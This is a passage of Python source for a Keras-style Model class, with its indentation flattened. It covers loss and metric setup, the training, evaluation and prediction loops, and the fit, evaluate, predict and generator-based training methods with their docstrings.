for i in range(len(self.outputs)):
if i in skip_indices:
self.targets.append(None)
else:
shape = self.internal_output_shapes[i]
name = self.output_names[i]
target = K.placeholder(ndim=len(shape),
name=name + '_target',
sparse=K.is_sparse(self.outputs[i]),
dtype=K.dtype(self.outputs[i]))
self.targets.append(target)
self._feed_targets.append(target)
# Prepare metrics.
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# Compute total loss.
total_loss = None
for i in range(len(self.outputs)):
if i in skip_indices:
continue
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
if total_loss is None:
if not self.losses:
raise RuntimeError('The model cannot be compiled '
'because it has no loss to optimize.')
else:
total_loss = 0.
# Add regularization penalties
# and other layer-specific losses.
for loss_tensor in self.losses:
total_loss += loss_tensor
# List of same size as output_names.
# contains tuples (metrics for output, names of metrics).
nested_metrics = _collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function used in loop below."""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
if i in skip_indices:
continue
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy
# (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if (output_shape[-1] == 1 or
self.loss_functions[i] == losses.binary_crossentropy):
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == losses.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
masked_fn = _masked_objective(acc_fn)
append_metric(i, 'acc', masked_fn(y_true, y_pred, mask=masks[i]))
else:
metric_fn = metrics_module.get(metric)
masked_metric_fn = _masked_objective(metric_fn)
metric_result = masked_metric_fn(y_true, y_pred, mask=masks[i])
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# Prepare gradient updates and state updates.
self.total_loss = total_loss
self.sample_weights = sample_weights
self._feed_sample_weights = []
for i in range(len(self.sample_weights)):
if i not in skip_indices:
self._feed_sample_weights.append(sample_weights[i])
# Functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
# Collect trainable weights and sort them deterministically.
trainable_weights = self.trainable_weights
# Sort weights by name.
if trainable_weights:
if K.backend() == 'theano':
trainable_weights.sort(key=lambda x: x.name if x.name else x.auto_name)
else:
trainable_weights.sort(key=lambda x: x.name)
self._collected_trainable_weights = trainable_weights
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise RuntimeError('You must compile your model before using it.')
if self.train_function is None:
inputs = self._feed_inputs + self._feed_targets + self._feed_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs += [K.learning_phase()]
training_updates = self.optimizer.get_updates(
self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# Gets loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
name='train_function',
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise RuntimeError('You must compile your model before using it.')
if self.test_function is None:
inputs = self._feed_inputs + self._feed_targets + self._feed_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs += [K.learning_phase()]
# Return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
name='test_function',
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs = self._feed_inputs + [K.learning_phase()]
else:
inputs = self._feed_inputs
# Gets network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
name='predict_function',
**kwargs)
def _fit_loop(self, f, ins, out_labels=None, batch_size=32,
epochs=100, verbose=1, callbacks=None,
val_f=None, val_ins=None, shuffle=True,
callback_metrics=None, initial_epoch=0):
"""Abstract fit function for `f(ins)`.
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
epochs: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
`History` object.
"""
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
if ins and hasattr(ins[0], 'shape'):
num_train_samples = ins[0].shape[0]
else:
# May happen if we are running `fit` without Numpy input data,
# i.e. if all inputs to the model are data tensors
# instead of placeholders.
# In that case we will run `fit` over a single batch.
num_train_samples = batch_size
verbose = 2
index_array = np.arange(num_train_samples)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
out_labels = out_labels or []
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
'batch_size': batch_size,
'epochs': epochs,
'samples': num_train_samples,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics or [],
})
callbacks.on_train_begin()
callback_model.stop_training = False
for cbk in callbacks:
cbk.validation_data = val_ins
for epoch in range(initial_epoch, epochs):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = _batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = _make_batches(num_train_samples, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
except TypeError:
raise TypeError('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if callback_model.stop_training:
break
if batch_index == len(batches) - 1: # Last batch.
if do_validation:
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
if ins and hasattr(ins[0], 'shape'):
samples = ins[0].shape[0]
else:
# May happen if we are running `predict` without Numpy input data,
# i.e. if all inputs to the model are data tensors
# instead of placeholders.
# In that case we will run `predict` over a single batch.
samples = batch_size
verbose = 2
outs = []
if verbose == 1:
progbar = Progbar(target=samples)
batches = _make_batches(samples, batch_size)
index_array = np.arange(samples)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if ins and isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
batch_outs = f(ins_batch)
if not isinstance(batch_outs, list):
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (samples,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=batch_out.dtype))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
if ins and hasattr(ins[0], 'shape'):
samples = ins[0].shape[0]
else:
# May happen if we are running `evaluate` without Numpy input data,
# i.e. if all inputs to the model are data tensors
# instead of placeholders.
# In that case we will run `evaluate` over a single batch.
samples = batch_size
verbose = 2
outs = []
if verbose == 1:
progbar = Progbar(target=samples)
batches = _make_batches(samples, batch_size)
index_array = np.arange(samples)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
batch_outs = f(ins_batch)
if isinstance(batch_outs, list):
if batch_index == 0:
for _ in batch_outs:
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i in range(len(outs)):
outs[i] /= samples
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_axis=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise RuntimeError('You must compile a model before '
'training/testing. '
'Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self._feed_output_shapes, self._feed_loss_fns):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(losses, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes,
check_batch_axis=False,
exception_prefix='input')
y = _standardize_input_data(y, self._feed_output_names,
output_shapes,
check_batch_axis=False,
exception_prefix='target')
sample_weights = _standardize_sample_weights(sample_weight,
self._feed_output_names)
class_weights = _standardize_class_weights(class_weight,
self._feed_output_names)
sample_weights = [_standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self._feed_sample_weight_modes)]
_check_array_lengths(x, y, sample_weights)
_check_loss_and_target_compatibility(y,
self._feed_loss_fns,
self._feed_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def _get_deduped_metrics_names(self):
out_labels = self.metrics_names
# Rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows).
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
return deduped_out_labels
def fit(self, x=None,
y=None,
batch_size=32,
epochs=1,
verbose=1,
callbacks=None,
validation_split=0.,
validation_data=None,
shuffle=True,
class_weight=None,
sample_weight=None,
initial_epoch=0,
**kwargs):
"""Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
epochs: integer, the number of times to iterate
over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode.
0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate
the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate
the loss and any model metrics
at the end of each epoch. The model will not
be trained on this data.
This could be a tuple (x_val, y_val)
or a tuple (x_val, y_val, val_sample_weights).
shuffle: boolean, whether to shuffle the training data
before each epoch.
class_weight: optional dictionary mapping
class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
# Raises
ValueError: In case of mismatch between the provided input data
and what the model expects.
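# Example
A minimal sketch using random data; a compiled `model` with a
10-dimensional input and a single output is assumed, and the shapes,
batch size and number of epochs are illustrative only:
```python
import numpy as np
x = np.random.random((100, 10))
y = np.random.randint(0, 2, size=(100, 1))
history = model.fit(x, y,
                    batch_size=16,
                    epochs=2,
                    validation_split=0.2,
                    verbose=0)
print(history.history['loss'])
```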
"""
# Legacy support
if 'nb_epoch' in kwargs:
warnings.warn('The `nb_epoch` argument in `fit` '
'has been renamed `epochs`.', stacklevel=2)
epochs = kwargs.pop('nb_epoch')
if kwargs:
raise TypeError('Unrecognized keyword arguments: ' + str(kwargs))
# Validate user data.
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=False,
batch_size=batch_size)
# Prepare validation data.
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise ValueError('When passing validation_data, '
'it must contain 2 (x_val, y_val) '
'or 3 (x_val, y_val, val_sample_weights) '
'items, however it contains %d items' %
len(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(
val_x, val_y,
sample_weight=val_sample_weight,
check_batch_axis=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (_slice_arrays(x, 0, split_at), _slice_arrays(x, split_at))
y, val_y = (_slice_arrays(y, 0, split_at), _slice_arrays(y, split_at))
sample_weights, val_sample_weights = (
_slice_arrays(sample_weights, 0, split_at),
_slice_arrays(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# Prepare input arrays and training function.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# Prepare display labels.
out_labels = self._get_deduped_metrics_names()
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# Delegate logic to `_fit_loop`.
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, epochs=epochs,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics,
initial_epoch=initial_epoch)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
"""Returns the loss value & metrics values for the model in test mode.
Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
verbose: verbosity mode, 0 or 1.
sample_weight: Array of weights to weight the contribution
of different samples to the loss and metrics.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
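# Example
A minimal sketch; a compiled `model` and matching `x`/`y` arrays are
assumed to exist already:
```python
results = model.evaluate(x, y, batch_size=16, verbose=0)
# `model.metrics_names` gives the label for each returned scalar.
print(model.metrics_names, results)
```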
"""
# Validate user data.
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=False,
batch_size=batch_size)
# Prepare inputs, delegate logic to `_test_loop`.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
"""Generates output predictions for the input samples.
Computation is done in batches.
# Arguments
x: the input data, as a Numpy array
(or list of Numpy arrays if the model has multiple outputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
Numpy array(s) of predictions.
# Raises
ValueError: In case of mismatch between the provided
input data and the model's expectations,
or in case a stateful model receives a number of samples
that is not a multiple of the batch size.
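# Example
A minimal sketch; a built `model` with a 10-dimensional input is
assumed, and the input data is a random placeholder:
```python
import numpy as np
x = np.random.random((32, 10))
preds = model.predict(x, batch_size=16)
print(preds.shape)
```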
"""
# Validate user data.
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes,
check_batch_axis=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# Prepare inputs, delegate logic to `_predict_loop`.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
"""Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping
class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss
(if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
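# Example
A minimal sketch; a compiled `model` with a 10-dimensional input and a
single output is assumed, and the batch contents are random placeholders:
```python
import numpy as np
x_batch = np.random.random((16, 10))
y_batch = np.random.randint(0, 2, size=(16, 1))
loss = model.train_on_batch(x_batch, y_batch)
```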
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=True)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
"""Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=True)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
"""Returns predictions for a single batch of samples.
# Arguments
x: Input samples, as a Numpy array.
# Returns
Numpy array(s) of predictions.
"""
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
@interfaces.legacy_generator_methods_support
def fit_generator(self, generator,
steps_per_epoch,
epochs=1,
verbose=1,
callbacks=None,
validation_data=None,
validation_steps=None,
class_weight=None,
max_q_size=10,
workers=1,
pickle_safe=False,
initial_epoch=0):
"""Fits the model on data yielded batch-by-batch by a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `steps_per_epoch`
batches have been seen by the model.
steps_per_epoch: Total number of steps (batches of samples)
to yield from `generator` before declaring one epoch
finished and starting the next epoch. It should typically
be equal to the number of unique samples of your dataset
divided by the batch size.
epochs: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
validation_steps: Only relevant if `validation_data`
is a generator. Total number of steps (batches of samples)
to yield from `generator` before stopping.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
workers: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
steps_per_epoch=10000, epochs=10)
```
# Raises
ValueError: In case the generator yields
data in an invalid format.
"""
wait_time = 0.01 # in seconds
epoch = initial_epoch
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not validation_steps:
raise ValueError('When using a generator for validation data, '
'you must specify a value for '
'`validation_steps`.')
# Prepare display labels.
out_labels = self._get_deduped_metrics_names()
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger(count_mode='steps')]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
'epochs': epochs,
'steps': steps_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation and not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise ValueError('validation_data should be a tuple '
'`(val_x, val_y, val_sample_weight)` '
'or `(val_x, val_y)`. Found: ' +
str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(
val_x, val_y, val_sample_weight)
val_data = val_x + val_y + val_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_data += [0.]
for cbk in callbacks:
cbk.validation_data = val_data
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(max_q_size=max_q_size, workers=workers)
callback_model.stop_training = False
while epoch < epochs:
callbacks.on_epoch_begin(epoch)
steps_done = 0
batch_index = 0
while steps_done < steps_per_epoch:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
# build batch logs
batch_logs = {}
if isinstance(x, list):
batch_size = x[0].shape[0]
elif isinstance(x, dict):
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# Construct epoch logs.
epoch_logs = {}
batch_index += 1
steps_done += 1
# Epoch finished.
if steps_done >= steps_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(
validation_data,
validation_steps,
max_q_size=max_q_size,
workers=workers,
pickle_safe=pickle_safe)
else:
# No need for try/except because
# data has already been validated.
val_outs = self.evaluate(
val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
finally:
if enqueuer is not None:
enqueuer.stop()
callbacks.on_train_end()
return self.history
@interfaces.legacy_generator_methods_support
def evaluate_generator(self, generator, steps,
max_q_size=10, workers=1, pickle_safe=False):
"""Evaluates the model on a data generator.
The generator should return the same kind of data
as accepted by `test_on_batch`.
# Arguments
generator: Generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
steps: Total number of steps (batches of samples)
to yield from `generator` before stopping.
max_q_size: maximum size for the generator queue
workers: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
# Raises
ValueError: In case the generator yields
data in an invalid format.
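# Example
An illustrative sketch; `eval_gen()` is a placeholder generator
yielding `(inputs, targets)` batches for an already-compiled `model`:
```python
import numpy as np

def eval_gen():
    while True:
        yield np.random.random((16, 10)), np.random.randint(0, 2, size=(16, 1))

results = model.evaluate_generator(eval_gen(), steps=20)
```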
"""
self._make_test_function()
steps_done = 0
wait_time = 0.01
all_outs = []
batch_sizes = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(workers=workers, max_q_size=max_q_size)
while steps_done < steps:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
